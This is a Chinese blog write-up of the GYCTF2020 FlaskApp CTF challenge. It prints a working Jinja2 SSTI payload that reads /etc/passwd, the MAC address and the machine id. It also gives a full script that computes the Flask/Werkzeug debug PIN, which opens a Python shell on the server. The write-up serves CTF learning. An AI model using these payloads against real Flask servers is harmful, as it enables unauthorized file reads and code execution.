[GYCTF2020]FlaskApp--Flask Debug PIN

最新推荐文章于 2024-07-13 16:30:52 发布
最新推荐文章于 2024-07-13 16:30:52 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: SSTI CTF 复现 文章标签: 安全 flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/121634781
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 4 订阅
订阅专栏
SSTI
8 篇文章 0 订阅
订阅专栏

一.前言

已经很久没有写文章了,最近快要到期末了,事情一天比一天多,没有时间做靶场的题目了。这篇文章想写很久了,事实上在一周前就已经用PIN码的方式做出来了这道题,但是一直没有时间来整理,今天下课来到图书馆翻开自己的截图记录就想着把它写出来算了。

二.正文

​​​​​​​​​​​​首先,打开题目,来看这个页面
在这里插入图片描述
测试的过程我就不说了,关键是要触发这个程序的报错,使其进入debug页面。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Cd0ERYCZ-1638344677443)(C:\Users\薛安\AppData\Roaming\Typora\typora-user-images\image-20211130161316605.png)]
我们尝试进入python shell但是flask的debug页面进入python shell是需要pin码的,所以这就带来一个问题,flask的pin码是怎么生成的?详情请大家来看https://zhuanlan.zhihu.com/p/32336971这篇文章,这篇文章说的很详细。
在这里插入图片描述
总之,这个pin码的生成取决于下面这几个因素:

1.服务器运行flask所登录的用户名。
2.modname
2.getattr(app, “name”, app.class.name)。
3.flask库下app.py的绝对路径。
4.当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address获得
5.最后一个就是机器的id。
其中modname就是flask.app,getattr(app, “name”, app.class.name)就是Flask这两个一般是不会变的,app.py的绝对路径我们可以直接从它的报错信息中得知。所以,一同分析下来我们只剩用户名,机器id,mac地址
我们在之前的文章中曾经做过这道题,这里面存在SSTI漏洞,我们可以通过SSTI漏洞来获取所有的组件,最后通过脚本生成PIN。
我们用下面的payload来读取用户名。

{% for c in [].__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read()}}{% endif %}{% endfor %}

请添加图片描述
其中的用户名是flaskweb。
我们用上面的payload稍加改动,将其中读文件的部分改成/sys/class/net/eth0/address,就可以读取机器的MAC地址了。
在这里插入图片描述
还剩下一个机器的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,而docker的id在/proc/self/cgroup,所以像上面那样改一下payload就能用。
在这里插入图片描述
我们用一下大佬写的脚本来生成payload。脚本来源

#!/usr/bin/python2.7
#coding:utf-8

from sys import *
import requests
import re
from itertools import chain
import hashlib

def genpin(mac,mid):

    probably_public_bits = [
        'flaskweb', # username
        'flask.app', # 一般为固定值modname
        'Flask', # getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
    ]
    mac = "0x"+mac.replace(":","")
    mac = int(mac,16)
    private_bits = [
        str(mac), # str(uuid.getnode()),  /sys/class/net/eth0/address
        str(mid) # get_machine_id(), /proc/sys/kernel/random/boot_id
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    num = None
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    rv =None
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                            for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    return rv

def getcode(content):
    try:
        return re.findall(r"<pre>([\s\S]*)</pre>",content)[0].split()[0]
    except:
        return ''
def getshell():
    print (genpin("02:42:ac:10:af:ca","b53170cd20be5202463fa5e0a54ea66fbeb1f2c058dcb09e105767cfc41acba4"))

if __name__ == '__main__':
    getshell()

运行结果如下
在这里插入图片描述
我们输入PIN码就可以用pythonshell了。
接下来就是执行命令了。
在这里插入图片描述
cat flag
在这里插入图片描述

后记

最近不知道为什么,我的笔记本在CSDN上传不了图片了,只能用台式机来写了,不知道是什么问题,希望以后能解决这个问题吧。

入山梵行
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
GYCTF2020 FlaskApp
汗的博客
09-04 1701
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flask的SSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
[GYCTF2020]FlaskApp 1(SSTI,PIN
weixin_45577185的博客
10-20 1241
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
BUUCTF:[GYCTF2020]FlaskApp
末初的CSDN博客
09-19 1276
BUUCTF:[GYCTF2020]FlaskApp Writeup
[GYCTF2020]FlaskApp1
2303_77961060的博客
05-09 345
在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于。通过源代码的框架可以判断是FlaskFlask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造。的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.构造{{config}},先加密,再把加密结果解密,结果输出。
[GYCTF2020]FlaskApp
Sk1y的博客
06-10 2084
知识点:flask框架开启debug模式产生的漏洞,PIN码的产生过程和文件读取,字符串拼接绕过,倒序绕过过滤。
Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3060
ssti的payload还是不太会写… Flask debug 模式生成pin码 计算pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
[GYCTF2020]FlaskApp 1
最新发布
ubaichu的博客
07-13 740
[GYCTF2020]FlaskApp 1 详细解题过程
ssti python 沙箱jinja2利用,PIN获取之[GYCTF2020]FlaskApp
qq_58970968的博客
08-20 408
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,首先判断是什么类型的ssti,再利用,这里通过报错抛出debug信息的内容判断:爆出的报错部分的代码里面的特殊函数;得到的Mac地址:print(int('去掉“:”后的地址',16))
初探flask debug生成pin
m0_62422842的博客
08-22 1323
flask框架pin码的生成进行初步认识,通过一道ctf题目加深对pin码的理解
buuctf_练[GYCTF2020]FlaskApp
m0_66225311的博客
10-26 731
`ssti`的`python debug`的`PIN`码计算,调用`debug`命令行执行命令。存在`ssti`注入就能进行命令执行,使用拼接操作绕过关键字过滤`['o'+'s']`。不同版本的`python`计算pin码的代码不同。`python`的模板注入可以通过for循环遍历子类特征名的方式,来寻找能够执行命令的子类模块
Flask-2.2.2-py3-none-any.whl
02-04
该资源为Flask-2.2.2-py3-none-any.whl,欢迎下载使用哦!
flaskapp-Todo
03-16
4. `models.py`:如果项目涉及数据库操作,这里可能定义了数据模型,使用Flask-SQLAlchemy扩展来与数据库交互。 5. `requirements.txt`:列出项目依赖的Python库及其版本,方便其他开发者复现环境。 6. `config.py`...
flask-mysqldb:Flask Web框架MySQL扩展
02-05
Flask-MySQLdb Flask-MySQLdb为Flask提供MySQL连接。 快速开始 首先,安装Flask-MySQLdb: $ pip install flask-mysqldb Flask-MySQLdb依赖于并将为您安装Flask的最新版本(0.12.4或更高版本)和 。 Flask-MySQLdb...
flask-3.0.2-py3-none-any.whl
03-07
在压缩包子文件的文件名称列表中,我们看到有两个文件:flask-3.0.2-py3-none-any.whl.txt和flask-3.0.2-py3-none-any.whl。前者可能是关于这个wheel包的一些说明文档或者日志,后者则是实际的可安装包文件。通常,....
Flask框架Flask-Login用法分析
09-20
**Flask-Login是Flask框架的一个扩展,用于处理用户登录和身份验证。它提供了一套简单而强大的机制,帮助开发者轻松地管理用户会话。本文将深入探讨Flask-Login的基本用法、核心概念以及如何集成到Flask应用中。** ...
WEB-INF/web.xml泄露漏洞及其利用
热门推荐
Mrs_H的博客
08-10 1万+
前言 之所以写这篇文章,是因为最近在做题的时候,做到了一个有关java的题目。因为对Java Web方面的开发经验很少,所以在做这道题的时候,查了一些关于Java Web相关的知识。感觉以后说不定还会用到,就以这篇文章来总结一下。 关于WEB-INF/web.xml 在了解WEB-INF/web.xml泄露之前,我们先要知道,web.xml是一个什么样的文件,以及它的泄露会出现哪些问题。 咱们先来看看WEB-INF这个文件夹 WEB-INF主要包含以下内容: /WEB-INF/web.xml:Web应用程
[De1CTF 2019]SSRF Me——一个好的开端
Mrs_H的博客
12-02 3356
[De1CTF 2019]SSRF Me 一.前言 今天抽出时间来学ssrf了,老样子最一开始的学习阶段会从简单的题目进行入手,然后逐渐去往深层次的方面学习。但是最近应该不会写博客写的那么频繁了,有关CTF的事情也都会放一放了,因为要期末了,而且因为一些缘故,期末考试的时间应该会提前,要开始忙起来了。 二.正文 题目没有给前端界面,直接把项目的源码打在了首页上面。源码如下: #! /usr/bin/env python # #encoding=utf-8 from flask import Flask fr
[SCTF2019]Flag Shop——瞧,这是个新来的
Mrs_H的博客
11-23 2968
[SCTF2019]Flag Shop 一.前言 这几天一直有事,导致之前的比赛的WP也没看,然后靶场这方面的学习也没推进下去,终于找了个时间的空挡做了道关于Ruby的模板注入。为了这道题我甚至抽出了我本就不多的时间去学了学Ruby的语法,话说学完Ruby之后,我的感触是他与Python等脚本语言很像,但是它的语法中字里行间都透露着Java等语言的关系。关于这次的SSTI题目,与其他的SSTI有着很大的不同。 二.正文 老样子,我们先看题目 题目的意思很简单就是我们要通过足够的jinkela来购买flag
exec flask --app b2c db upgrade
06-10
`flask` 是 Flask 应用程序的命令行工具,`--app b2c` 指定 Flask 应用程序的名称为 `b2c`,`db upgrade` 是 Flask-Migrate 提供的命令,用于执行数据库迁移。在执行 `db upgrade` 命令前,需要先配置 Flask-Migrate...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值